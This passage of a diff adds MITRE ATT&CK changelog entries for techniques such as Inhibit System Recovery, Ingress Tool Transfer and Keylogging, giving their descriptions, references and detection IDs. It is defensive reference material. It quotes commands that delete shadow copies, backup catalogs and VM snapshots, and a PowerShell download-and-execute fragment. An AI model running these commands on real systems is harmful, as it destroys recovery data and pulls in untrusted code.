+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0591: Cross-Platform Behavioral Detection of File Timestomping via Metadata Tampering"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Indirect Command Execution",
+                    "description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (`pcalua.exe`), components of the Windows Subsystem for Linux (WSL), `Scriptrunner.exe`, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe) Adversaries may also abuse the `ssh.exe` binary to execute malicious commands via the `ProxyCommand` and `LocalCommand` options, which can be invoked via the `-o` flag or by modifying the SSH config file.(Citation: Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot)\n\nAdversaries may abuse these features for [Stealth](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1202",
+                            "external_id": "T1202"
+                        },
+                        {
+                            "source_name": "Bleeping Computer - Scriptrunner.exe",
+                            "description": "Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting tool to deploy malware. Retrieved July 8, 2024.",
+                            "url": "https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/"
+                        },
+                        {
+                            "source_name": "Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot",
+                            "description": "Cyble. (2024, December 5). Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot. Retrieved February 4, 2025.",
+                            "url": "https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/"
+                        },
+                        {
+                            "source_name": "Evi1cg Forfiles Nov 2017",
+                            "description": "Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved September 12, 2024.",
+                            "url": "https://x.com/Evi1cg/status/935027922397573120"
+                        },
+                        {
+                            "source_name": "Secure Team - Scriptrunner.exe",
+                            "description": "Secure Team - Information Assurance. (2023, January 8). Windows Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.",
+                            "url": "https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/"
+                        },
+                        {
+                            "source_name": "SS64",
+                            "description": "SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.",
+                            "url": "https://ss64.com/nt/scriptrunner.html"
+                        },
+                        {
+                            "source_name": "VectorSec ForFiles Aug 2017",
+                            "description": "vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved September 12, 2024.",
+                            "url": "https://x.com/vector_sec/status/896049052642533376"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Liran Ravich, CardinalOps",
+                        "Matthew Demaske, Adaptforward"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2026-04-15 20:31:14.152000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0200: Indirect Command Execution \u2013 Windows utility abuse behavior chain"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:16.408000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Ingress Tool Transfer",
+                    "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1105",
+                            "external_id": "T1105"
+                        },
+                        {
+                            "source_name": "T1105: Trellix_search-ms",
+                            "description": " Mathanraj Thangaraju, Sijo Jacob. (2023, July 26). Beyond File Search: A Novel Method for Exploiting the \"search-ms\" URI Protocol Handler. Retrieved March 15, 2024.",
+                            "url": "https://www.trellix.com/blogs/research/beyond-file-search-a-novel-method/"
+                        },
+                        {
+                            "source_name": "Google Cloud Threat Intelligence COSCMICENERGY 2023",
+                            "description": "COSMICENERGY: New OT Malware Possibly Related To Russian Emergency Response Exercises. (2023, May 25). Ken Proska, Daniel Kapellmann Zafra, Keith Lunden, Corey Hildebrandt, Rushikesh Nandedkar, Nathan Brubaker. Retrieved March 18, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/cosmicenergy-ot-malware-russian-response/"
+                        },
+                        {
+                            "source_name": "Dropbox Malware Sync",
+                            "description": "David Talbot. (2013, August 21). Dropbox and Similar Services Can Sync Malware. Retrieved May 31, 2023.",
+                            "url": "https://www.technologyreview.com/2013/08/21/83143/dropbox-and-similar-services-can-sync-malware/"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "t1105_lolbas",
+                            "description": "LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.",
+                            "url": "https://lolbas-project.github.io/#t1105"
+                        },
+                        {
+                            "source_name": "PTSecurity Cobalt Dec 2016",
+                            "description": "Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.",
+                            "url": "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Alain Homewood",
+                        "Jeremy Hedges",
+                        "Joe Wise",
+                        "John Page (aka hyp3rlinx), ApparitionSec",
+                        "Mark Wee",
+                        "Peter Oakes",
+                        "Selena Larson, @selenalarson",
+                        "Shailesh Tiwary (Indian Army)",
+                        "The DFIR Report",
+                        "Don Le, Stifel Financial"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-10-24 17:49:32.714000+00:00\"}}}",
+                    "previous_version": "2.6",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0060: Detect Ingress Tool Transfers via Behavioral Chain"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-04-02 13:54:43.136000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "Inhibit System Recovery",
+                    "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* <code>vssadmin.exe</code> can be used to delete all volume shadow copies on a system - <code>vssadmin.exe delete shadows /all /quiet</code>\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - <code>wmic shadowcopy delete</code>\n* <code>wbadmin.exe</code> can be used to delete the Windows Backup Catalog - <code>wbadmin.exe delete catalog -quiet</code>\n* <code>bcdedit.exe</code> can be used to disable automatic Windows recovery features by modifying boot configuration data - <code>bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no</code>\n* <code>REAgentC.exe</code> can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n* <code>diskshadow.exe</code> can be used to delete all volume shadow copies on a system - <code>diskshadow delete shadows all</code> (Citation: Diskshadow) (Citation: Crytox Ransomware)\n\nOn network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nOn ESXi servers, adversaries may delete or encrypt snapshots of virtual machines to support [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486), preventing them from being leveraged as backups (e.g., via ` vim-cmd vmsvc/snapshot.removeall`).(Citation: Cybereason)\n\nAdversaries may also delete \u201conline\u201d backups that are connected to their network \u2013 whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1490",
+                            "external_id": "T1490"
+                        },
+                        {
+                            "source_name": "Dark Reading Code Spaces Cyber Attack",
+                            "description": " Brian Prince. (2014, June 20). Code Hosting Service Shuts Down After Cyber Attack. Retrieved March 21, 2023.",
+                            "url": "https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack"
+                        },
+                        {
+                            "source_name": "FireEye WannaCry 2017",
+                            "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"
+                        },
+                        {
+                            "source_name": "Cybereason",
+                            "description": "Cybereason Nocturnus. (n.d.). Cybereason vs. BlackCat Ransomware. Retrieved March 26, 2025.",
+                            "url": "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware"
+                        },
+                        {
+                            "source_name": "Talos Olympic Destroyer 2018",
+                            "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.",
+                            "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"
+                        },
+                        {
+                            "source_name": "Diskshadow",
+                            "description": "Microsoft Windows Server. (2023, February 3). Diskshadow. Retrieved November 21, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow"
+                        },
+                        {
+                            "source_name": "Crytox Ransomware",
+                            "description": "Romain Dumont . (2022, September 21). Technical Analysis of Crytox Ransomware. Retrieved November 22, 2023.",
+                            "url": "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware"
+                        },
+                        {
+                            "source_name": "Rhino Security Labs AWS S3 Ransomware",
+                            "description": "Spencer Gietzen. (n.d.). AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense. Retrieved March 21, 2023.",
+                            "url": "https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/"
+                        },
+                        {
+                            "source_name": "ZDNet Ransomware Backups 2020",
+                            "description": "Steve Ranger. (2020, February 27). Ransomware victims thought their backups were safe. They were wrong. Retrieved March 21, 2023.",
+                            "url": "https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/"
+                        },
+                        {
+                            "source_name": "disable_notif_synology_ransom",
+                            "description": "TheDFIRReport. (2022, March 1). Disabling notifications on Synology servers before ransom. Retrieved September 12, 2024.",
+                            "url": "https://x.com/TheDFIRReport/status/1498657590259109894"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Yonatan Gotlib, Deep Instinct",
+                        "Austin Clark, @c2defense",
+                        "Pallavi Sivakumaran, WithSecure",
+                        "Joey Lei",
+                        "Harjot Shah Singh"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2025-10-24 17:49:37.297000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.6",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1038: Execution Prevention",
+                            "M1053: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0329: Behavioral Detection for T1490 - Inhibit System Recovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:58:45.908000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "GUI Input Capture",
+                    "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)\n\nAdversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1056/002",
+                            "external_id": "T1056.002"
+                        },
+                        {
+                            "source_name": "LogRhythm Do You Trust Oct 2014",
+                            "description": "Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.",
+                            "url": "https://logrhythm.com/blog/do-you-trust-your-computer/"
+                        },
+                        {
+                            "source_name": "Spoofing credential dialogs",
+                            "description": "Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.",
+                            "url": "https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/"
+                        },
+                        {
+                            "source_name": "OSX Keydnap malware",
+                            "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.",
+                            "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"
+                        },
+                        {
+                            "source_name": "Enigma Phishing for Credentials Jan 2015",
+                            "description": "Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.",
+                            "url": "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/"
+                        },
+                        {
+                            "source_name": "OSX Malware Exploits MacKeeper",
+                            "description": "Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.",
+                            "url": "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Matthew Molyett, @s1air, Cisco Talos"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:10.643000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0521: Behavioral Detection of Spoofed GUI Credential Prompts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:58:11.791000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Keylogging",
+                    "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1056/001",
+                            "external_id": "T1056.001"
+                        },
+                        {
+                            "source_name": "Talos Kimsuky Nov 2021",
+                            "description": "An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.",
+                            "url": "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        },
+                        {
+                            "source_name": "Adventures of a Keystroke",
+                            "description": "Tinaztepe,  E. (n.d.). The Adventures of a Keystroke:  An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.",
+                            "url": "http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "TruKno"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:21.756000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0089: Behavioral Detection of Keylogging Activity Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:59:50.058000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Web Portal Capture",
+                    "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "collection"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1056/003",
+                            "external_id": "T1056.003"
+                        },
+                        {
+                            "source_name": "Volexity Virtual Private Keylogging",
+                            "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.",
+                            "url": "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2025-10-24 17:48:54.254000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management"
